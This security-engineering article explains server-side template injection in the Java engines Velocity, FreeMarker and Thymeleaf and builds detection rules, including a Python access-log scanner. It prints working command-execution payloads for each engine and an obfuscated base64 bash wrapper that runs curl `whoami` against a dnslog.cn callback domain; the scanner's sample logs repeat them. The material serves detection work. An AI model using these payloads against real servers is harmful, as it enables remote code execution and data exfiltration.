Information Security

Analyzing Java Template Engine Injection Vulnerabilities and Building Automated Detection Capabilities

This article examines injection vulnerabilities in Java template engines Velocity, FreeMarker, and Thymeleaf, details payload extraction, demonstrates how to generate automated detection rules and security operation capabilities, and discusses future directions for comprehensive attack‑chain analysis.

Dada Group Technology

1. Introduction

Security detection capabilities are a critical part of enterprise security operations, especially for automated vulnerability detection and threat‑traffic identification. This article describes a practice of building detection capabilities from payloads extracted from template‑engine injection vulnerabilities, organized according to the ATT&CK knowledge base.

2. Vulnerability Exploitation Analysis

2.1 Velocity

Apache Velocity is a Java‑based template engine. Its syntax uses # for directives and $ for variables. The following payload, when rendered through Velocity's evaluate method, starts from a plain String object and uses reflection to reach java.lang.Runtime and execute arbitrary commands:

payload:%23set($e="e");$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("calc")

By sending the payload as the template parameter of /ssti/velocity?template=, the command is executed via the Runtime class.

2.2 FreeMarker

FreeMarker is a Java template engine used to generate HTML, emails, configuration files, etc. Injection is achieved by instantiating the freemarker.template.utility.Execute class with the ?new built‑in and calling it with a command string:

<#assign ex="freemarker.template.utility.Execute"?new()>${ ex("calc") }

The payload is submitted via a template request, causing the command to run.

2.3 Thymeleaf

Thymeleaf is the default template engine for Spring Boot. Two payload variants are demonstrated:

payload:__$%7bnew java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22calc%22).getInputStream()).next()%7d__::.x
payload:__$%7BT(java.lang.Runtime).getRuntime().exec(%22calc%22)%7D__::.x

Both payloads rely on Thymeleaf's __${...}__ preprocessing syntax to have the embedded SpEL expression evaluated, which executes the calc command; the first variant additionally reads the command's output through a java.util.Scanner.

3. Detection Capability Generation

By extracting the payloads from the three template engines, we can create automated vulnerability detection rules and security‑operation threat detection capabilities. Since the output of a directly executed command is not visible in the response, the payloads are modified to trigger a DNS‑log request, which confirms execution out of band.

Original command: curl `whoami`.8uuq15.dnslog.cn
Base64 encoding of the command: Y3VybCBgd2hvYW1pYC44dXVxMTUuZG5zbG9nLmNu
Brace‑expansion wrapper (no whitespace in the injected string): bash -c {echo,Y3VybCBgd2hvYW1pYC44dXVxMTUuZG5zbG9nLmNu}|{base64,-d}|{bash,-i}

Adjusted payload examples for DNS‑log detection:

Velocity: %23set($e="e");$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("bash -c {echo,Y3VybCBgd2hvYW1pYC44dXVxMTUuZG5zbG9nLmNu}|{base64,-d}|{bash,-i}")

FreeMarker: <#assign ex="freemarker.template.utility.Execute"?new()>${ ex("bash -c {echo,Y3VybCBgd2hvYW1pYC44dXVxMTUuZG5zbG9nLmNu}|{base64,-d}|{bash,-i}") }

Thymeleaf: __$%7bnew java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22bash -c {echo,Y3VybCBgd2hvYW1pYC44dXVxMTUuZG5zbG9nLmNu}|{base64,-d}|{bash,-i}%22).getInputStream()).next()%7d__::.x

3.1 Security Operation Detection

Using the extracted payload patterns, detection rules can be created (e.g., for FreeMarker injection) to generate alerts when matching traffic is observed. The rules should match on the URL‑decoded request rather than the raw encoded form, so that variants such as %23set or %7B are caught as well.
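As an added illustration of sections 2 and 3 (this is example code written for this page, not the author's detection rules or any vendor product), the following Python detector applies URL‑decoding‑first rules for the three payload shapes to access‑log lines, and, when it finds the base64 brace‑expansion wrapper from section 3, decodes it to recover the command and the out‑of‑band DNS‑log domain as an indicator. The log lines are constructed for the example (combined‑log style, reusing the article's payloads and the 8uuq15.dnslog.cn domain); the regular expressions, the rule names, and the /ssti/... paths are assumptions, not part of any standard.

```python
import base64
import re
from typing import Iterable, List, Optional
from urllib.parse import unquote

# Constructed sample access-log lines (combined-log style), not captured traffic.
# The first three reuse the payloads shown in the article; the last two are benign.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /ssti/velocity?template=%23set($e=%22e%22);'
    '$e.getClass().forName(%22java.lang.Runtime%22).getMethod(%22getRuntime%22,null).invoke(null,null)'
    '.exec(%22bash%20-c%20{echo,Y3VybCBgd2hvYW1pYC44dXVxMTUuZG5zbG9nLmNu}|{base64,-d}|{bash,-i}%22) HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /ssti/freemarker?template=%3C%23assign%20ex='
    '%22freemarker.template.utility.Execute%22?new()%3E${%20ex(%22calc%22)%20} HTTP/1.1" 500 88',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /__$%7BT(java.lang.Runtime).getRuntime()'
    '.exec(%22calc%22)%7D__::.x HTTP/1.1" 404 0',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /ssti/velocity?template=Hello%20$name HTTP/1.1" 200 42',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /search?q=java%20runtime%20tutorial HTTP/1.1" 200 2048',
]

REQUEST_TARGET = re.compile(r'"(?:GET|POST|PUT|PATCH) (\S+) HTTP/')

# Detection rules (assumed patterns derived from the three payload shapes in the article).
# They are applied to the fully URL-decoded request target, never to the raw encoded form.
RULES = [
    ("velocity",
     re.compile(r"#set\s*\(.*?\).*?(getClass\(\)\.forName|java\.lang\.Runtime)", re.I | re.S)),
    ("freemarker",
     re.compile(r"freemarker\.template\.utility\.Execute|<#assign\s+\w+\s*=\s*\"[^\"]*\"\?new\(\)", re.I)),
    ("thymeleaf",
     re.compile(r"__\$\{.*?\}__\s*::|T\(java\.lang\.Runtime\)", re.I | re.S)),
    ("generic-java-rce",
     re.compile(r"java\.lang\.Runtime|\.getRuntime\(\)\s*\.exec\(", re.I)),
]

# The base64 brace-expansion wrapper used in the article to hide the real command.
ENCODED_BASH = re.compile(r"bash\s+-c\s+\{echo,([A-Za-z0-9+/=]+)\}\|\{base64,-d\}")
# Host names such as the out-of-band DNS-log domain; sufficient for indicator extraction here.
DOMAIN = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)


def fully_decode(target: str, max_rounds: int = 3) -> str:
    """URL-decode repeatedly so double-encoded payloads are normalized as well.

    unquote (not unquote_plus) is used on purpose: '+' is a valid base64
    character and must survive decoding for the wrapper to be recovered.
    """
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def analyze_request(target: str) -> Optional[dict]:
    """Return a finding for one request target, or None if no rule matches."""
    decoded = fully_decode(target)
    engines = [name for name, rx in RULES if rx.search(decoded)]
    if not engines:
        return None
    finding = {"engines": engines, "decoded_command": None, "callback_domain": None}
    wrapper = ENCODED_BASH.search(decoded)
    if wrapper:
        b64 = wrapper.group(1)
        try:
            # Re-pad in case the attacker stripped the '=' characters.
            command = base64.b64decode(b64 + "=" * (-len(b64) % 4)).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError subclass
            command = None
        if command:
            finding["decoded_command"] = command
            host = DOMAIN.search(command)
            if host:
                finding["callback_domain"] = host.group(0)
    return finding


def scan_log(lines: Iterable[str]) -> List[dict]:
    """Run the rules over access-log lines; each finding carries its 0-based line index."""
    findings = []
    for index, line in enumerate(lines):
        m = REQUEST_TARGET.search(line)
        if not m:
            continue
        finding = analyze_request(m.group(1))
        if finding:
            finding["line"] = index
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG_LINES):
        print(f"line {f['line']}: engines={f['engines']} "
              f"command={f['decoded_command']!r} callback={f['callback_domain']}")
```

Running the script flags the three injected requests and leaves the two benign ones alone; for the Velocity request it also reports the recovered command and the 8uuq15.dnslog.cn callback domain, which is the value an analyst would pivot on in DNS logs. The generic rule is kept separate from the engine‑specific ones so that a request matching only java.lang.Runtime can be triaged at a lower severity than a complete engine payload.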

3.2 Security Defense

When a vulnerability is detected, developers can apply the corresponding fix, and security engineers can verify the remediation. For active attacks, security devices can block the malicious traffic and initiate incident response.

4. Conclusion and Outlook

Based on the ATT&CK framework, we have generated detection capabilities for individual template‑engine vulnerabilities. Future work aims to correlate multiple alerts across attack stages to automatically reconstruct full attack chains, improving the efficiency of security analysis and response.

Tags: java, Thymeleaf, Security Automation, Velocity, freemarker, payload detection, template injection
Written by

Dada Group Technology

Sharing insights and experiences from Dada Group's R&D department on product refinement and technology advancement, connecting with fellow geeks to exchange ideas and grow together.
